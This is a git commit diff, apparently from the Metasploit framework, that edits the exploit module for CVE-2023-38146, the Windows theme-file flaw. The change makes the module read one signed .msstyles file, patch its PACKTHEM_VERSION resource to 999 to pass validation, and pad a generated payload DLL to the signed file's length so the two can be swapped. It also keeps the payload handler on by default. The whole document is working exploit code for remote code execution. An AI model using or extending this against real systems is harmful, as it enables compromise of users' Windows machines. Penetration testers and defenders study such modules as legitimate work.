Bring in zerosteiner's PACKME_VERSION edit
This commit is contained in:
commit
7fafab9680
|
@ -21,7 +21,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
'DisclosureDate' => '2023-09-13',
|
'DisclosureDate' => '2023-09-13',
|
||||||
'Author' => [
|
'Author' => [
|
||||||
'gabe_k', # Discovery/PoC
|
'gabe_k', # Discovery/PoC
|
||||||
'bwatters-r7' # msf exploit
|
'bwatters-r7', # msf exploit
|
||||||
|
'Spencer McIntyre' # msf exploit
|
||||||
],
|
],
|
||||||
'References' => [
|
'References' => [
|
||||||
['CVE', '2023-38146'],
|
['CVE', '2023-38146'],
|
||||||
|
@ -39,15 +40,15 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
'Stability' => [CRASH_SAFE],
|
'Stability' => [CRASH_SAFE],
|
||||||
'Reliability' => [REPEATABLE_SESSION],
|
'Reliability' => [REPEATABLE_SESSION],
|
||||||
'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS]
|
'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS]
|
||||||
}
|
},
|
||||||
|
'DefaultOptions' => { 'DisablePayloadHandler' => false }
|
||||||
)
|
)
|
||||||
)
|
)
|
||||||
|
|
||||||
register_options([
|
register_options([
|
||||||
|
OptPath.new('STYLE_FILE', [ true, 'The Microsoft-signed .msstyles file (e.g. aero.msstyles).', '' ], regex: /.*\w*\.msstyles$/),
|
||||||
OptString.new('STYLE_FILE_NAME', [ true, 'The name of the style file to reference.', '' ], regex: /^\w*(\.msstyles)?$/),
|
OptString.new('STYLE_FILE_NAME', [ true, 'The name of the style file to reference.', '' ], regex: /^\w*(\.msstyles)?$/),
|
||||||
OptString.new('THEME_FILE_NAME', [ true, 'The name of the theme file to generate.', 'exploit.theme' ]),
|
OptString.new('THEME_FILE_NAME', [ true, 'The name of the theme file to generate.', 'exploit.theme' ])
|
||||||
OptPath.new('MS_SIGNED_DLL', [true, 'Signed Microsoft DLL to use for passing validation']),
|
|
||||||
OptPath.new('MS_VERSION_FILE', [true, 'Signed Microsoft DLL to use for passing validation'])
|
|
||||||
])
|
])
|
||||||
|
|
||||||
deregister_options(
|
deregister_options(
|
||||||
|
@ -69,7 +70,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def primer
|
def primer
|
||||||
legit_dll = File.binread(datastore['MS_SIGNED_DLL'])
|
legit_dll = File.binread(datastore['STYLE_FILE'])
|
||||||
payload_dll = generate_payload_dll
|
payload_dll = generate_payload_dll
|
||||||
max_length = [payload_dll.length, legit_dll.length].max
|
max_length = [payload_dll.length, legit_dll.length].max
|
||||||
# make sure that the lengths are the same by padding the smaller to the length of the larger
|
# make sure that the lengths are the same by padding the smaller to the length of the larger
|
||||||
|
@ -99,7 +100,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
|
|
||||||
def get_file_contents(client:)
|
def get_file_contents(client:)
|
||||||
print_status("Sending file to #{client.peerhost}")
|
print_status("Sending file to #{client.peerhost}")
|
||||||
File.binread(datastore['MS_VERSION_FILE'])
|
pe_raw = File.binread(datastore['STYLE_FILE'])
|
||||||
|
pe = Rex::PeParsey::Pe.new_from_string(pe_raw)
|
||||||
|
version_offset = pe.rva_to_file_offset(pe.resources['/PACKTHEM_VERSION/0/0'].rva)
|
||||||
|
pe_raw[0...version_offset] + [999].pack('v') + pe_raw[(version_offset + 2)...]
|
||||||
end
|
end
|
||||||
|
|
||||||
def make_theme
|
def make_theme
|
||||||
|
|
Loading…
Reference in New Issue